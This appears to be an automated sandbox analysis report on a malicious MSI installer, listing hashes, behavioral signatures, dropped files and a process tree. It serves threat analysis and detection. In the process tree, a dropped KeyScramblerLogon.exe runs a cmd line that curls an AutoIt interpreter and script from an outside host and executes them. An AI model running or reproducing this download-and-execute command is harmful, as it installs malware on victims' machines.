Overview
overview
10Static
static
10f33535fb28...a7.exe
windows7-x64
10f33535fb28...a7.exe
windows10-2004-x64
10f3476b5441...96.exe
windows7-x64
10f3476b5441...96.exe
windows10-2004-x64
10f479112f0f...e2.msi
windows7-x64
7f479112f0f...e2.msi
windows10-2004-x64
8f64398ee74...a4.exe
windows7-x64
10f64398ee74...a4.exe
windows10-2004-x64
10f672ba8bf0...6f.exe
windows7-x64
10f672ba8bf0...6f.exe
windows10-2004-x64
10f92501ffd4...76.exe
windows7-x64
10f92501ffd4...76.exe
windows10-2004-x64
10fa20559cba...8e.exe
windows7-x64
10fa20559cba...8e.exe
windows10-2004-x64
10fa98feb0fc...05.exe
windows7-x64
7fa98feb0fc...05.exe
windows10-2004-x64
7fb1c133bb4...90.exe
windows7-x64
10fb1c133bb4...90.exe
windows10-2004-x64
10fbce724386...fe.exe
windows7-x64
10fbce724386...fe.exe
windows10-2004-x64
10fc82f1f187...54.exe
windows7-x64
10fc82f1f187...54.exe
windows10-2004-x64
10fd03ea32f5...54.exe
windows7-x64
7fd03ea32f5...54.exe
windows10-2004-x64
7fe21006be0...ea.exe
windows7-x64
10fe21006be0...ea.exe
windows10-2004-x64
10fe53c0822d...00.elf
debian-9-armhf
1fe6b8e0d18...a4.exe
windows7-x64
10fe6b8e0d18...a4.exe
windows10-2004-x64
10ff53a80edb...60.bat
windows7-x64
7ff53a80edb...60.bat
windows10-2004-x64
7ffbd6ffb75...4e.exe
windows7-x64
10Analysis
-
max time kernel
150s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
10-10-2023 13:04
Behavioral task
behavioral1
Sample
f33535fb2813fbfee8e03ea80d11b1a9007db801ec8b6261277377c35d233ba7.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
f33535fb2813fbfee8e03ea80d11b1a9007db801ec8b6261277377c35d233ba7.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
f3476b5441c34dfe8ca745464622aea4a00cb1196861a6972d66c38f50b2f096.exe
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
f3476b5441c34dfe8ca745464622aea4a00cb1196861a6972d66c38f50b2f096.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
f64398ee74ab5760caccfef93c615d537375c92241c15d2ea09fd402138786a4.exe
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
f64398ee74ab5760caccfef93c615d537375c92241c15d2ea09fd402138786a4.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
f672ba8bf05715a07351bf661588fcc42a13f814b4b6c3c9ea3519d35861a86f.exe
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
f672ba8bf05715a07351bf661588fcc42a13f814b4b6c3c9ea3519d35861a86f.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
f92501ffd4feea52666cbf60a5fe88c6583c1264680cf53950739370686fd776.exe
Resource
win7-20230831-en
Behavioral task
behavioral12
Sample
f92501ffd4feea52666cbf60a5fe88c6583c1264680cf53950739370686fd776.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
fa20559cbae909b4b7307dc6dc7a10ecd482af8ff4f2fd588f950185d5695d8e.exe
Resource
win7-20230831-en
Behavioral task
behavioral14
Sample
fa20559cbae909b4b7307dc6dc7a10ecd482af8ff4f2fd588f950185d5695d8e.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
fa98feb0fc8ff8b25659427c063181b1d05600900959b0eb4f478a0688d7f105.exe
Resource
win7-20230831-en
Behavioral task
behavioral16
Sample
fa98feb0fc8ff8b25659427c063181b1d05600900959b0eb4f478a0688d7f105.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
fb1c133bb4d681619adff92051b62f07da505ca6f15906b4fbb125bd65b1f190.exe
Resource
win7-20230831-en
Behavioral task
behavioral18
Sample
fb1c133bb4d681619adff92051b62f07da505ca6f15906b4fbb125bd65b1f190.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
fbce72438627da5767059d2f925ac2a318283149c77cd507a7b82ddb614fc6fe.exe
Resource
win7-20230831-en
Behavioral task
behavioral20
Sample
fbce72438627da5767059d2f925ac2a318283149c77cd507a7b82ddb614fc6fe.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral21
Sample
fc82f1f187a911727bd8bac3ab3c8aeba9eec12c9b9445547cf7c56b2097b954.exe
Resource
win7-20230831-en
Behavioral task
behavioral22
Sample
fc82f1f187a911727bd8bac3ab3c8aeba9eec12c9b9445547cf7c56b2097b954.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral23
Sample
fd03ea32f520aa57ee6b4e29eedf1c897857f9368933c2bb3367d2016dc27454.exe
Resource
win7-20230831-en
Behavioral task
behavioral24
Sample
fd03ea32f520aa57ee6b4e29eedf1c897857f9368933c2bb3367d2016dc27454.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral25
Sample
fe21006be0bc93da7054954bbd0ff37fc8ec20c4bb7984234a900589c2d5cbea.exe
Resource
win7-20230831-en
Behavioral task
behavioral26
Sample
fe21006be0bc93da7054954bbd0ff37fc8ec20c4bb7984234a900589c2d5cbea.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral27
Sample
fe53c0822d0b31a92436603f7f1d8892ecc21e43b5524767f83e93f05af0f500.elf
Resource
debian9-armhf-20230831-en
Behavioral task
behavioral28
Sample
fe6b8e0d183bf1cf3105a86efd5d70110afd4a05ddcfc7555bb2053f08812fa4.exe
Resource
win7-20230831-en
Behavioral task
behavioral29
Sample
fe6b8e0d183bf1cf3105a86efd5d70110afd4a05ddcfc7555bb2053f08812fa4.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral30
Sample
ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660.bat
Resource
win7-20230831-en
Behavioral task
behavioral31
Sample
ff53a80edbe3f726f55d17b3671723ff1a2062b17b30beae33bdb4f173733660.bat
Resource
win10v2004-20230915-en
Behavioral task
behavioral32
Sample
ffbd6ffb75e77b342f3caa7729254ef5dc198c783a78310d74923fd86ce4614e.exe
Resource
win7-20230831-en
General
-
Target
f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi
-
Size
660KB
-
MD5
8e68a2869daf1ba9eaebf31d2d87973e
-
SHA1
739627919a7d4b972454158911edce0106eb5df0
-
SHA256
f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2
-
SHA512
35997befc485f7491e5e0fd0cb50a3e5a2f7111638eeb58d36498f68c48d380d9c08d2d03f8c49cc0300830438550e2fb7fa3ac4f9f1bcede2bcad3f3b14f513
-
SSDEEP
12288:ntvRQ+gjpjegGdo8kgLKxBTi9byLw2wHvHgU3qfrbDW:ntncpVGPkgtyLHw33qjbD
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1644 KeyScramblerLogon.exe -
Loads dropped DLL 11 IoCs
pid Process 1704 MsiExec.exe 1704 MsiExec.exe 1704 MsiExec.exe 1704 MsiExec.exe 1704 MsiExec.exe 1644 KeyScramblerLogon.exe 2776 WerFault.exe 2776 WerFault.exe 2776 WerFault.exe 2776 WerFault.exe 2776 WerFault.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2484 ICACLS.EXE -
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2620 msiexec.exe 5 2620 msiexec.exe 6 2748 msiexec.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\Installer\f76da0a.msi msiexec.exe File created C:\Windows\Installer\f76da0b.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIDE7C.tmp msiexec.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log EXPAND.EXE File created C:\Windows\Installer\f76da0a.msi msiexec.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Logs\DPX\setupact.log EXPAND.EXE File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 2776 1644 WerFault.exe 39 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2748 msiexec.exe 2748 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeShutdownPrivilege 2620 msiexec.exe Token: SeIncreaseQuotaPrivilege 2620 msiexec.exe Token: SeRestorePrivilege 2748 msiexec.exe Token: SeTakeOwnershipPrivilege 2748 msiexec.exe Token: SeSecurityPrivilege 2748 msiexec.exe Token: SeCreateTokenPrivilege 2620 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2620 msiexec.exe Token: SeLockMemoryPrivilege 2620 msiexec.exe Token: SeIncreaseQuotaPrivilege 2620 msiexec.exe Token: SeMachineAccountPrivilege 2620 msiexec.exe Token: SeTcbPrivilege 2620 msiexec.exe Token: SeSecurityPrivilege 2620 msiexec.exe Token: SeTakeOwnershipPrivilege 2620 msiexec.exe Token: SeLoadDriverPrivilege 2620 msiexec.exe Token: SeSystemProfilePrivilege 2620 msiexec.exe Token: SeSystemtimePrivilege 2620 msiexec.exe Token: SeProfSingleProcessPrivilege 2620 msiexec.exe Token: SeIncBasePriorityPrivilege 2620 msiexec.exe Token: SeCreatePagefilePrivilege 2620 msiexec.exe Token: SeCreatePermanentPrivilege 2620 msiexec.exe Token: SeBackupPrivilege 2620 msiexec.exe Token: SeRestorePrivilege 2620 msiexec.exe Token: SeShutdownPrivilege 2620 msiexec.exe Token: SeDebugPrivilege 2620 msiexec.exe Token: SeAuditPrivilege 2620 msiexec.exe Token: SeSystemEnvironmentPrivilege 2620 msiexec.exe Token: SeChangeNotifyPrivilege 2620 msiexec.exe Token: SeRemoteShutdownPrivilege 2620 msiexec.exe Token: SeUndockPrivilege 2620 msiexec.exe Token: SeSyncAgentPrivilege 2620 msiexec.exe Token: SeEnableDelegationPrivilege 2620 msiexec.exe Token: SeManageVolumePrivilege 2620 msiexec.exe Token: SeImpersonatePrivilege 2620 msiexec.exe Token: SeCreateGlobalPrivilege 2620 msiexec.exe Token: SeBackupPrivilege 1636 vssvc.exe Token: SeRestorePrivilege 1636 vssvc.exe Token: SeAuditPrivilege 1636 vssvc.exe Token: SeBackupPrivilege 2748 msiexec.exe Token: SeRestorePrivilege 2748 msiexec.exe Token: SeRestorePrivilege 1404 DrvInst.exe Token: SeRestorePrivilege 1404 DrvInst.exe Token: SeRestorePrivilege 1404 DrvInst.exe Token: SeRestorePrivilege 1404 DrvInst.exe Token: SeRestorePrivilege 1404 DrvInst.exe Token: SeRestorePrivilege 1404 DrvInst.exe Token: SeRestorePrivilege 1404 DrvInst.exe Token: SeLoadDriverPrivilege 1404 DrvInst.exe Token: SeLoadDriverPrivilege 1404 DrvInst.exe Token: SeLoadDriverPrivilege 1404 DrvInst.exe Token: SeRestorePrivilege 2748 msiexec.exe Token: SeTakeOwnershipPrivilege 2748 msiexec.exe Token: SeRestorePrivilege 2748 msiexec.exe Token: SeTakeOwnershipPrivilege 2748 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2620 msiexec.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2748 wrote to memory of 1704 2748 msiexec.exe 32 PID 2748 wrote to memory of 1704 2748 msiexec.exe 32 PID 2748 wrote to memory of 1704 2748 msiexec.exe 32 PID 2748 wrote to memory of 1704 2748 msiexec.exe 32 PID 2748 wrote to memory of 1704 2748 msiexec.exe 32 PID 2748 wrote to memory of 1704 2748 msiexec.exe 32 PID 2748 wrote to memory of 1704 2748 msiexec.exe 32 PID 1704 wrote to memory of 2484 1704 MsiExec.exe 35 PID 1704 wrote to memory of 2484 1704 MsiExec.exe 35 PID 1704 wrote to memory of 2484 1704 MsiExec.exe 35 PID 1704 wrote to memory of 2484 1704 MsiExec.exe 35 PID 1704 wrote to memory of 472 1704 MsiExec.exe 37 PID 1704 wrote to memory of 472 1704 MsiExec.exe 37 PID 1704 wrote to memory of 472 1704 MsiExec.exe 37 PID 1704 wrote to memory of 472 1704 MsiExec.exe 37 PID 1704 wrote to memory of 1644 1704 MsiExec.exe 39 PID 1704 wrote to memory of 1644 1704 MsiExec.exe 39 PID 1704 wrote to memory of 1644 1704 MsiExec.exe 39 PID 1704 wrote to memory of 1644 1704 MsiExec.exe 39 PID 1644 wrote to memory of 2708 1644 KeyScramblerLogon.exe 40 PID 1644 wrote to memory of 2708 1644 KeyScramblerLogon.exe 40 PID 1644 wrote to memory of 2708 1644 KeyScramblerLogon.exe 40 PID 1644 wrote to memory of 2708 1644 KeyScramblerLogon.exe 40 PID 1644 wrote to memory of 2776 1644 KeyScramblerLogon.exe 42 PID 1644 wrote to memory of 2776 1644 KeyScramblerLogon.exe 42 PID 1644 wrote to memory of 2776 1644 KeyScramblerLogon.exe 42 PID 1644 wrote to memory of 2776 1644 KeyScramblerLogon.exe 42 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2620
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A73C272E8947C186F4248C2417806E542⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\." /SETINTEGRITYLEVEL (CI)(OI)HIGH3⤵
- Modifies file permissions
PID:2484
-
-
C:\Windows\SysWOW64\EXPAND.EXE"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files3⤵
- Drops file in Windows directory
PID:472
-
-
C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe"C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\SysWOW64\cmd.execmd /c cd /d %temp% & curl -o Autoit3.exe http://piret-wismann.com:2351 & curl -o cztngt.au3 http://piret-wismann.com:2351/cztngt & Autoit3.exe cztngt.au34⤵PID:2708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 1644⤵
- Loads dropped DLL
- Program crash
PID:2776
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000004B0" "0000000000000578"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1404
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e11e31581aae545302f6176a117b4d95
SHA1743af0529bd032a0f44a83cdd4baa97b7c2ec49a
SHA2562e7bf16cc22485a7bbe2aa8696750761b0ae39be3b2fe9d0cc6d4ef73491425c
SHA512c63aba6ca79c60a92b3bd26d784a5436e45a626022958bf6c194afc380c7bfb01fadf0b772513bbdbd7f1bb73691b0edb2f60b2f235ec9e0b81c427e04fbe451
-
Filesize
1KB
MD5866912c070f1ecacacc2d5bca55ba129
SHA1b7ab3308d1ea4477ba1480125a6fbda936490cbb
SHA25685666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b69
SHA512f91e855e0346ac8c3379129154e01488bb22cff7f6a6df2a80f1671e43c5df8acae36fdf5ee0eb2320f287a681a326b6f1df36e8e37aa5597c4797dd6b43b7cf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07298EE8EBA9732300AE62BDCA6B6898
Filesize312B
MD58e836d45a6e9b62df809f1caa5103c04
SHA1b6bcc3ea55148c94bfabed542577aff8ec115722
SHA256c6b348c38b6ac9847a39c2d1735571391f4f80f46c1b2b565e7c6ba350f24627
SHA5120f65b7c633a4d3ab524c3495c1731dc668569bf8b387ad1c08e692e71862634c836189636a408671e1bd9c2511c21b57dfff050d31cbe70adcb27a8b2b870a83
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8555326CC9661C9937DC5053B6C38763
Filesize326B
MD5038c40efb33d72377a287b4312fb49d5
SHA1f516f283c6d4b2f9687630d1059ae225251e4368
SHA256b79d39b55e78387c9a3efd1101726e3fe38f610bdf3f89d743afcd9ad51b375f
SHA512d1ccce0c1e8d736b86c2ffa84513a5e9d453528ae2d52617f7bf7f4e9e2bb18df7e8aa238d4ef084d70bd8bff42279fa8fea6e96d416ed95c46adabc36940ae8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize304B
MD5252e41058761904ac6a9ba202011fe8e
SHA1ece912df95aa0bd293fd7e4a8399e41306dbf98c
SHA2562f93e94892008cf4a52d2e9a1d87fc9034a0528d5363d31412acd459e3361572
SHA5125f4d573481a46464036418814bb5d54eccd0ad0f7990e610425db7d71ee7ce19ecad3b65871bacd2b25aefbf55037e6b71b7bae00ee40cacaad4ba9a964a908a
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
403KB
MD53a268087f8f162c60aa24d4fb9bd1b2b
SHA1b942dd465d2044953fb3ef9eb91f1d6138101687
SHA25653beb7204377b417d7439b84bdaee22a6c72eeb3fd1579dde8e0ad69506188c3
SHA512eadd2b867b5b352b866361546d5265d332c669ceff70bd375a703a1ee0b9e2e64c5d4e66c437854308427f7285efd101d4f85356e03ed1c5a7c5a76a3e0a9613
-
Filesize
454KB
MD59e0ae735a86eb8f0dc472f267ebbb74c
SHA153ff35f13620da5a432cd5dfac933749f070b74d
SHA2566978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a
SHA512b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222
-
C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe
Filesize500KB
MD5c790ebfcb6a34953a371e32c9174fe46
SHA13ead08d8bbdb3afd851877cb50507b77ae18a4d8
SHA256fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1
SHA51274e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554
-
C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe
Filesize500KB
MD5c790ebfcb6a34953a371e32c9174fe46
SHA13ead08d8bbdb3afd851877cb50507b77ae18a4d8
SHA256fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1
SHA51274e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554
-
Filesize
1KB
MD5b5e42487634d798b6bdf4c907a9a6021
SHA1dad2e82742e29fe61947b32f54564796b8e9a04e
SHA256cde38ccf33bb7d41e2b077001ada0fd4023620664c6d0b0933e4ab418535ab2e
SHA5125845fdf65e38755d288839e786ef04f8be0ac6c6dd9a14b48f8615087b022f8f2ed5b9db09bd4b7b1560479091fba9be9e4611179e9a0f7c6874bcf0cad24e96
-
Filesize
1KB
MD5b5e42487634d798b6bdf4c907a9a6021
SHA1dad2e82742e29fe61947b32f54564796b8e9a04e
SHA256cde38ccf33bb7d41e2b077001ada0fd4023620664c6d0b0933e4ab418535ab2e
SHA5125845fdf65e38755d288839e786ef04f8be0ac6c6dd9a14b48f8615087b022f8f2ed5b9db09bd4b7b1560479091fba9be9e4611179e9a0f7c6874bcf0cad24e96
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf
-
Filesize
208KB
MD5d82b3fb861129c5d71f0cd2874f97216
SHA1f3fe341d79224126e950d2691d574d147102b18d
SHA256107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c
SHA512244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b
-
Filesize
454KB
MD59e0ae735a86eb8f0dc472f267ebbb74c
SHA153ff35f13620da5a432cd5dfac933749f070b74d
SHA2566978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a
